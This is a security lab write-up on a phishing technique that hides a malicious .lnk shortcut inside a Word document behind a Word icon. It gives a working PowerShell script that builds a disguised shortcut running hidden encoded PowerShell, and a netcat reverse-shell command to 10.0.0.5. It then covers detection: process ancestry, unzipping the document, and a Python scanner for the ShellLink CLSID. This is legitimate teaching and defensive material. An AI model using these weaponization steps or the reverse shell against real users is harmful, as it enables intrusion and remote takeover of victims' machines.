# Phishing: OLE + LNK

This lab explores a popular phishing technique where attackers embed .lnk files into Office documents and camouflage them with MS Word icons in order to deceive victims into clicking and running them.

## Weaponization

Creating an .LNK file that will trigger the payload once executed:

{% code title="attacker\@local" %}

```powershell
# Command the shortcut will run, encoded as UTF-16LE base64 so it can be passed via -EncodedCommand
$command = 'Start-Process c:\shell.cmd'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)

# Create the .lnk through the WScript.Shell COM object
$obj = New-Object -ComObject wscript.shell
$link = $obj.CreateShortcut("c:\experiments\ole+lnk\Invoice-FinTech-0900541.lnk")
$link.WindowStyle = "7"                   # minimized window
$link.TargetPath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$link.IconLocation = "C:\Program Files\Windows NT\Accessories\wordpad.exe"   # borrow a document-looking icon
# Same value as the hardcoded UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAHMAaABlAGwAbAAuAGMAbQBkAA==
$link.Arguments = "-Nop -sta -noni -w hidden -encodedCommand $encodedCommand"
$link.Save()
```

{% endcode %}

The PowerShell payload will trigger a rudimentary nc reverse shell:

{% code title="c:\shell.cmd" %}

```batch
C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe
```

{% endcode %}

Once the above PowerShell script is executed, an `.LNK` shortcut is created:

![](/files/-LKRGjwTWCMH7EOxbc_b)

Let's create a Word document that will contain the malicious shortcut that was created in the previous step:

![](/files/-LKRH-VzxxtN9fSNg2js)

Let's insert a new object into the document by selecting `Package` and changing its icon source to the Microsoft Word executable:

![](/files/-LKRH8A1jNeHJgRGRomK)

![](/files/-LKRHOVbCzGL4Zo2WrpY)

Point the package to the .lnk file containing the payload:

![](/files/-LKRIT6mm4h7eR5y9ONB)

Final result:

![](/files/-LKRIbB24hFM9R322XmS)

## Execution

When the victim opens the document and runs the embedded object, they are presented with a popup asking them to confirm execution:

![](/files/-LKRIrtSxtXDuyyIk0fC)

Once the victim confirms they want to open the file, the reverse shell comes back to the attacker:

![](/files/-LKRIrtTxniAvaJ_vV5m)

{% file src="/files/-LKRFRs6PmCItZfJf0iN" %}
OLE+LNK Powershell Script
{% endfile %}

{% file src="/files/-LKRFM7BiZ-YUrYrELHD" %}
Invoice-FinTech-0900541.lnk
{% endfile %}

{% file src="/files/-LKRFEk2QEZ6V0akcxvk" %}
Phishing: OLE+Lnk MS Word Doc Package
{% endfile %}

## Observations

After the payload is triggered, the process ancestry looks as expected: powershell is spawned by winword, and cmd is spawned by powershell:

![](/files/-LKRJFn47fbXoXbUavdK)

Soon after, powershell gets killed and cmd.exe becomes an orphaned process:

![](/files/-LKRJHK53l5r1CQKTwBT)

Like in [T1137: Phishing - Office Macros](/offensive-security/initial-access/phishing-with-ms-office/t1137-office-vba-macros.md), you can use rudimentary tools on your Windows workstation to quickly triage the suspicious Office document. First off, rename the file to a .zip extension and unzip it. Then you can navigate to `word\embeddings` and find `oleObject.bin` file that contains the malicious `.lnk`:

![](/files/-LKRdsdTB5mK-QRljpQN)

Then you can run a simple `strings` or hexdump against the file and you should immediately see signs of something that should raise your eyebrow(s):

```powershell
hexdump.exe -C .\oleObject1.bin
```

![](/files/-LKRfHZ7vT28S8ZGjHjx)

As an analyst, one should look for `CLSID 00021401-0000-0000-c000-000000000046` (CLSID_ShellLink) in the .bin file, which signifies that the .doc contains an embedded .lnk file. In our case this can be observed here:

![](/files/-LLLlfqklzz5ti7PtC1W)
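The same triage can be scripted. The following is an added example, not part of the original lab: it opens a .docx as a zip, walks `word/embeddings/`, and searches each part for CLSID_ShellLink in its on-disk byte order (and for the full 0x4C-prefixed .lnk header). `build_sample_docx` produces constructed synthetic input for a stand-alone run; it is not the lab's document.

```python
import io
import struct
import uuid
import zipfile

# CLSID_ShellLink, the value the page says to look for. On disk a GUID stores
# its first three fields little-endian, so search for bytes_le, not the text.
SHELLLINK_CLSID_BYTES = uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le
# Every .lnk begins with HeaderSize 0x4C (4-byte LE) followed by CLSID_ShellLink.
LNK_HEADER_MAGIC = struct.pack("<I", 0x4C) + SHELLLINK_CLSID_BYTES


def find_all(haystack: bytes, needle: bytes) -> list:
    """Return every offset at which needle occurs in haystack."""
    hits, pos = [], haystack.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = haystack.find(needle, pos + 1)
    return hits


def scan_docx_for_embedded_lnk(docx) -> list:
    """Open a .docx (path or raw bytes) as a zip and report each part under
    word/embeddings/ carrying CLSID_ShellLink, plus any full .lnk header offsets."""
    source = io.BytesIO(docx) if isinstance(docx, (bytes, bytearray)) else docx
    findings = []
    with zipfile.ZipFile(source) as z:
        for name in z.namelist():
            if not name.startswith("word/embeddings/"):
                continue
            data = z.read(name)
            clsid_hits = find_all(data, SHELLLINK_CLSID_BYTES)
            if clsid_hits:
                findings.append({"part": name, "clsid_offsets": clsid_hits,
                                 "lnk_header_offsets": find_all(data, LNK_HEADER_MAGIC)})
    return findings


def build_sample_docx(embed_lnk: bool) -> bytes:
    """Constructed test input: a minimal zip shaped like a .docx. With embed_lnk,
    word/embeddings/oleObject1.bin holds a fake CFB prefix plus a bare .lnk header."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if embed_lnk:
            fake_cfb = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24  # 32 bytes
            fake_lnk = LNK_HEADER_MAGIC + b"\x00" * 56  # pad to the 76-byte header
            z.writestr("word/embeddings/oleObject1.bin", fake_cfb + fake_lnk)
    return buf.getvalue()
```

A real `oleObject.bin` is an OLE compound file wrapping the package stream, so a byte search is a quick first pass; a CLSID hit without a header hit still deserves a closer look with an OLE parser.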

## References

{% embed url="https://msdn.microsoft.com/en-gb/library/dd891343.aspx" %}

{% embed url="https://adsecurity.org/wp-content/uploads/2016/09/DerbyCon6-2016-AttackingEvilCorp-Anatomy-of-a-Corporate-Hack-Presented.pdf" %}
